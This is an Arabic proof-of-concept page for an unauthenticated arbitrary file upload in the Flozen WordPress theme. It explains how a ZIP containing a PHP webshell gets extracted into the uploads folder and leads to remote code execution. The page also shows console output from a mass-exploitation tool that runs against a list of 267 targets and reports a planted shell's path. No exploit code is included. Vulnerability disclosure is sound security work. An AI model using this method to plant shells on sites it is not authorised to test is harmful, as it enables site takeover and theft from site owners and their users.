
إثبات المفهوم
Flozen < 1.5.1 - رفع ملفات تعسفي بدون مصادقة
قالب Flozen < 1.5.1 - رفع ملفات تعسفي بدون مصادقة
الوصف
قالب Flozen لـ WordPress (الإصدارات حتى 1.5.1 وما يشملها) عرضة لرفع ملفات تعسفي بدون مصادقة، بسبب غياب فحوصات المصادقة وعدم كفاية التحقق من نوع الملف في الدالة flozen_add_new_custom_font(). يسمح هذا للمهاجمين غير المصادَق عليهم برفع ملفات ZIP تعسفية تحتوي على كود PHP خبيث (مثل webshell)، والتي يتم استخراجها تلقائيًا إلى wp-content/uploads/nasa-custom-fonts/، مما يؤدي إلى تنفيذ كود عن بُعد (RCE) بالكامل.
~ درجة CVSS: 9.8 (حرجة)
~ الإصدارات المتأثرة: < 1.5.1
- [?] Enter filename with targets: list.txt
- [?] Enter threads (5-50): 50
- [*] Loading targets...
- [+] Loaded 267 targets
- [*] Starting 50 threads...
- [!] Gak Ada Bro Themes nya!: http://target.com
- [+] Gas Exploit Cuk! http://example.com/ | Version: 1.2.8 🚩💉
- [+] Shell Ada Bro! http://example.com/wp-content/uploads/nasa-custom-fonts/shadow/index.php
الاستخدام غير المصرح به للأنظمة التي لا تملكها أو ليس لديك إذن لاختبارها غير قانوني.